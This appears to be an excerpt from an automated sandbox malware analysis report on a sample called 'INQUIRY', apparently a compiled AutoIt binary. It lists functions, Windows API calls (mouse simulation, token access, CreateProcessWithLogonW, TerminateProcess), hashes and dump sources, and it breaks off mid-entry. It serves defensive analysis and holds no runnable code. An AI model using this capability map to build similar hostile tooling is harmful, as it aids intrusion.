                                                                                              • API String ID: 642888154-0
                                                                                              • Opcode ID: b21620284c6524716b13600f3c1ef2f1c1a2538b213976324dd918ae44255efc
                                                                                              • Instruction ID: 870e2d558c1b12aed66b6e4fffbcdc0856ca763c53787c7f309b602e01054559
                                                                                              • Opcode Fuzzy Hash: b21620284c6524716b13600f3c1ef2f1c1a2538b213976324dd918ae44255efc
                                                                                              • Instruction Fuzzy Hash: 5B416634701240AFDF25CFA4E599B947BE1FF85310F1842B9F9489F6A2CB31A856CB61
                                                                                              Function 00A8709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00A84E41,?,?,00000000,00000001), ref: 00A870AC
                                                                                                • Part of subcall function 00A839A0: GetWindowRect.USER32(?,?), ref: 00A839B3
                                                                                              • GetDesktopWindow.USER32 ref: 00A870D6
                                                                                              • GetWindowRect.USER32(00000000), ref: 00A870DD
                                                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00A8710F
                                                                                                • Part of subcall function 00A75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A752BC
                                                                                              • GetCursorPos.USER32(?), ref: 00A8713B
                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A87199
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                              • String ID:
                                                                                              • API String ID: 4137160315-0
                                                                                              • Opcode ID: b55e3e6e0dd7660d8db6eb20ed3c4d702ae7af635a004fd9083f3b52e49592e7
                                                                                              • Instruction ID: f2cffe2622999e03248cd8e36d1179cd1f96d88391901135a90272ba7f960012
                                                                                              • Opcode Fuzzy Hash: b55e3e6e0dd7660d8db6eb20ed3c4d702ae7af635a004fd9083f3b52e49592e7
                                                                                              • Instruction Fuzzy Hash: 5A31A372605305AFD720EF54DC49A9FB7A9FF88314F10051AF58997191CB74EA05CB92
                                                                                              Function 00A68879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A680A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A680C0
                                                                                                • Part of subcall function 00A680A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A680CA
                                                                                                • Part of subcall function 00A680A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A680D9
                                                                                                • Part of subcall function 00A680A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A680E0
                                                                                                • Part of subcall function 00A680A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A680F6
                                                                                              • GetLengthSid.ADVAPI32(?,00000000,00A6842F), ref: 00A688CA
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A688D6
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00A688DD
                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00A688F6
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00A6842F), ref: 00A6890A
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A68911
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                              • String ID:
                                                                                              • API String ID: 3008561057-0
                                                                                              • Opcode ID: a81229fc1620534544a8bf07520a4654aa442c5323d95423e75541b14711ffac
                                                                                              • Instruction ID: 91fbf825bdc665cd62ff4ecd329c49379c79dd5a07b207ab1575e8bbe5cde196
                                                                                              • Opcode Fuzzy Hash: a81229fc1620534544a8bf07520a4654aa442c5323d95423e75541b14711ffac
                                                                                              • Instruction Fuzzy Hash: 0F119D72601209EFDB10DBE4DC09BBE777CEB45311F204229E995D7110DB3A9911DB60
                                                                                              Function 00A685B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00A685E2
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00A685E9
                                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00A685F8
                                                                                              • CloseHandle.KERNEL32(00000004), ref: 00A68603
                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A68632
                                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00A68646
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                              • String ID:
                                                                                              • API String ID: 1413079979-0
                                                                                              • Opcode ID: 9382b83447d0472cff66512c5a1eae49469c5bd6adff9aa9ce3322228cf889e1
                                                                                              • Instruction ID: 63dbf28e0eac900819e19b3315d48321264bb597f5fea592d4cc3983908b0021
                                                                                              • Opcode Fuzzy Hash: 9382b83447d0472cff66512c5a1eae49469c5bd6adff9aa9ce3322228cf889e1
                                                                                              • Instruction Fuzzy Hash: D6114776600249AFDF01CFE8DD49BDA7BBDEB08344F044165FE05A2160DA768E61AB60
                                                                                              Function 00A6B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00A6B7B5
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A6B7C6
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A6B7CD
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00A6B7D5
                                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00A6B7EC
                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 00A6B7FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: d1bb53e3451d892ac6f9166184fd496fc19cf239fd8c73f406cd6c0bf7be6ee5
                                                                                              • Instruction ID: bcf348c09f6a32a92121b02fd218389c4cbeacbc22c95d702e9e655de29a0058
                                                                                              • Opcode Fuzzy Hash: d1bb53e3451d892ac6f9166184fd496fc19cf239fd8c73f406cd6c0bf7be6ee5
                                                                                              • Instruction Fuzzy Hash: 6D018475E00309BFEB109BE69D45A5EBFB8EB48311F104076FA04E7291DA309C11CFA0
                                                                                              Function 00A30162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A30193
                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A3019B
                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A301A6
                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A301B1
                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A301B9
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A301C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual
                                                                                              • String ID:
                                                                                              • API String ID: 4278518827-0
                                                                                              • Opcode ID: 8b50999612536d084d99b6e0d2ad88fd1e76f8b3473e980c53ebd0e2d0261573
                                                                                              • Instruction ID: 8571afdef0a435f469f09d3a0592aab2ea2de060ea2597868992f5cd24c25936
                                                                                              • Opcode Fuzzy Hash: 8b50999612536d084d99b6e0d2ad88fd1e76f8b3473e980c53ebd0e2d0261573
                                                                                              • Instruction Fuzzy Hash: FE016CB09017597DE3008F5A8C85B52FFB8FF19354F00411BA15C8B941C7F5A864CBE5
                                                                                              Function 00A753E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A753F9
                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A7540F
                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00A7541E
                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A7542D
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A75437
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A7543E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                              • String ID:
                                                                                              • API String ID: 839392675-0
                                                                                              • Opcode ID: b885656995a7bb2025402458b65bec3fdb45e26564ce461694dc02e6f927200a
                                                                                              • Instruction ID: 3fa0b417e31ee0148d0fe867c3f1d9aee0fd08c2918ead875099120f4a09d707
                                                                                              • Opcode Fuzzy Hash: b885656995a7bb2025402458b65bec3fdb45e26564ce461694dc02e6f927200a
                                                                                              • Instruction Fuzzy Hash: 57F01D32641658BFE7219BA29C0DEAF7A7CEBC6B11F00016AFA05D10519AA51A4286B5
                                                                                              Function 00A77230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00A77243
                                                                                              • EnterCriticalSection.KERNEL32(?,?,00A20EE4,?,?), ref: 00A77254
                                                                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00A20EE4,?,?), ref: 00A77261
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00A20EE4,?,?), ref: 00A7726E
                                                                                                • Part of subcall function 00A76C35: CloseHandle.KERNEL32(00000000,?,00A7727B,?,00A20EE4,?,?), ref: 00A76C3F
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A77281
                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00A20EE4,?,?), ref: 00A77288
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 3495660284-0
                                                                                              • Opcode ID: a032b9657c9c268578b36b7d528394177211636460a161dbf838e393fdb48c05
                                                                                              • Instruction ID: 8c1dfec548127b6497472bbd1fadc8f87e5a13d326609f0038f3f07f8b111113
                                                                                              • Opcode Fuzzy Hash: a032b9657c9c268578b36b7d528394177211636460a161dbf838e393fdb48c05
                                                                                              • Instruction Fuzzy Hash: 23F05E76640612EFDB125BA4ED4CADF7729EF55702B204633F603D10A1CF766812CB90
                                                                                              Function 00A68992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A6899D
                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 00A689A9
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A689B2
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A689BA
                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00A689C3
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A689CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                              • String ID:
                                                                                              • API String ID: 146765662-0
                                                                                              • Opcode ID: dde481d8d359a3831b8a09ea1ab353fde0c88d5038f54a51d747f7786c7c3c75
                                                                                              • Instruction ID: b87b868f65ef464f00875746a5eb77f1e94c91d45b22da51660a4200e809ec4c
                                                                                              • Opcode Fuzzy Hash: dde481d8d359a3831b8a09ea1ab353fde0c88d5038f54a51d747f7786c7c3c75
                                                                                              • Instruction Fuzzy Hash: A0E0527A204505FFDA019FF5EC0C95ABB69FB89762B608632F329C5470CF369462DB90
                                                                                              Function 00A885ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 00A88613
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00A88722
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A8889A
                                                                                                • Part of subcall function 00A77562: VariantInit.OLEAUT32(00000000), ref: 00A775A2
                                                                                                • Part of subcall function 00A77562: VariantCopy.OLEAUT32(00000000,?), ref: 00A775AB
                                                                                                • Part of subcall function 00A77562: VariantClear.OLEAUT32(00000000), ref: 00A775B7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                              • API String ID: 4237274167-1221869570
                                                                                              • Opcode ID: c125e6b525a8407c332bf42f087520816dbe3f65ee6e86175c48515ed33f9de7
                                                                                              • Instruction ID: 0afcb79d8ebf189f7fb98c874b05d56cbbfdb4ad47b189ef5872c4d9a8194b21
                                                                                              • Opcode Fuzzy Hash: c125e6b525a8407c332bf42f087520816dbe3f65ee6e86175c48515ed33f9de7
                                                                                              • Instruction Fuzzy Hash: 2A917A74A083019FCB10EF24C58495BBBF4EF89754F54892EF88A8B361DB35E945CB92
                                                                                              Function 00A72A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A2FC86: _wcscpy.LIBCMT ref: 00A2FCA9
                                                                                              • _memset.LIBCMT ref: 00A72B87
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A72BB6
                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A72C69
                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A72C97
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                              • String ID: 0
                                                                                              • API String ID: 4152858687-4108050209
                                                                                              • Opcode ID: f576af1ab69d25ce2250522af12713d4117c2125a037a0bbdd495666f14e6857
                                                                                              • Instruction ID: e150288f5f07de9e1b36cf680eb8f566b023e75cfc9fc982405a1f726cb211e3
                                                                                              • Opcode Fuzzy Hash: f576af1ab69d25ce2250522af12713d4117c2125a037a0bbdd495666f14e6857
                                                                                              • Instruction Fuzzy Hash: 5551CC716083019ED7269F28DC45B6FB7E8EBA8350F14CA2EF899D2291DB70CD449752
                                                                                              Function 00A6D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A6D5D4
                                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A6D60A
                                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00A6D61B
                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A6D69D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                              • String ID: DllGetClassObject
                                                                                              • API String ID: 753597075-1075368562
                                                                                              • Opcode ID: 1b18fa13f58d21f1d45fcd395e1b24cfa6c65ab241a13e639be9bf81e28799be
                                                                                              • Instruction ID: 78415c50db04c51aa440981c0f4afc4d0f6695b4e691c8f7812cc4164e72a65a
                                                                                              • Opcode Fuzzy Hash: 1b18fa13f58d21f1d45fcd395e1b24cfa6c65ab241a13e639be9bf81e28799be
                                                                                              • Instruction Fuzzy Hash: 2E418EB5B10204EFDB05CF64C884B9A7BB9EF44350F1581AAED09DF205D7B1D940DBA0
                                                                                              Function 00A72753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A727C0
                                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00A727DC
                                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00A72822
                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00AD5890,00000000), ref: 00A7286B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 1173514356-4108050209
                                                                                              • Opcode ID: e821ae8bb46e7d48c40d626640eea7a23e4467e733bd83192d2aaf0d447d6bc6
                                                                                              • Instruction ID: 63ad49830e2acc6652980732db1768e6d5f8ba1d8459f9ce85fd8dad3cad6dc1
                                                                                              • Opcode Fuzzy Hash: e821ae8bb46e7d48c40d626640eea7a23e4467e733bd83192d2aaf0d447d6bc6
                                                                                              • Instruction Fuzzy Hash: 3C418E702043419FD724DF25DC44B5ABBE8EF85314F14C92EF9A997292DB31A905CB53
                                                                                              Function 00A8D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00A8D7C5
                                                                                                • Part of subcall function 00A1784B: _memmove.LIBCMT ref: 00A17899
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharLower_memmove
                                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                                              • API String ID: 3425801089-567219261
                                                                                              • Opcode ID: 33632a1fd3e490330506b1996f3e8af6bd3223f647f86e9278de9256a00f94d0
                                                                                              • Instruction ID: c6c80e67054e9ccd758a2d4db6932cd8c6963e10cf356ad035b9759e235f561d
                                                                                              • Opcode Fuzzy Hash: 33632a1fd3e490330506b1996f3e8af6bd3223f647f86e9278de9256a00f94d0
                                                                                              • Instruction Fuzzy Hash: F931AD71904619AFCF00EF68C955DEEB3B4FF04320F108A29E825AB6D1DB31AD05CB80
                                                                                              Function 00A68E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
